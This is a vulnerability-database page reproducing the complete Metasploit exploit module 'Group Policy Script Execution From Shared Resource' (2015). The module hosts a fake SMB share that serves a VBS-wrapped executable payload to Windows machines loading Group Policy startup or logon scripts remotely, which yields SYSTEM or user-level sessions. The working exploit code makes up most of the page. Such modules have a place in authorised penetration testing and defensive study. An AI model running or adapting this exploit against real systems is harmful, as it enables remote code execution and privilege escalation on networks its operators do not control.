Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Group Policy Script Execution From Shared Resource

🗓️ 07 May 2015 00:00:00Reported by juan vazquezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Group Policy Script Execution From Shared Resource. Exploits Windows systems with Group Policy loading VBS startup/logon scripts from remote locations via SMB shared resource to provide payload. Attacker needs to redirect target traffic to fake SMB share

Code
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ManualRanking  
  
include Msf::Exploit::Remote::SMB::Server::Share  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Group Policy Script Execution From Shared Resource',  
'Description' => %q{  
This is a general-purpose module for exploiting systems with Windows Group Policy  
configured to load VBS startup/logon scripts from remote locations. This module runs  
a SMB shared resource that will provide a payload through a VBS file. Startup scripts  
will be executed with SYSTEM privileges, while logon scripts will be executed with the  
user privileges. Have into account which the attacker still needs to redirect the  
target traffic to the fake SMB share to exploit it successfully. Please note in some  
cases, it will take 5 to 10 minutes to receive a session.  
},  
'Author' =>  
[  
'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba  
'juan vazquez' # msf module  
],  
'References' =>  
[  
['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],  
['URL', 'https://github.com/GDSSecurity/BadSamba']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => false,  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X86_64],  
'Payload' =>  
{  
'Space' => 2048,  
'DisableNops' => true  
},  
'Targets' =>  
[  
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],  
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 26 2015'  
))  
  
register_options(  
[  
OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])  
], self.class)  
  
deregister_options('FILE_CONTENTS')  
end  
  
def setup  
super  
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"  
@custom_payloads = {}  
print_status("File available on #{unc}...")  
end  
  
def on_client_connect(client)  
super(client)  
  
unless @custom_payloads[:client]  
p = regenerate_payload(client)  
exe = p.encoded_exe  
@custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)  
end  
end  
  
def get_file_contents(client:)  
contents = @custom_payloads[client] || super(client: client)  
  
contents  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 May 2015 00:00Current
7.4High risk
Vulners AI Score7.4
exploitgroup policywindowssmbshared resourcevbsstartuplogonprivilege escalationremote executionmetasploitsystem privilegesuser privileges
23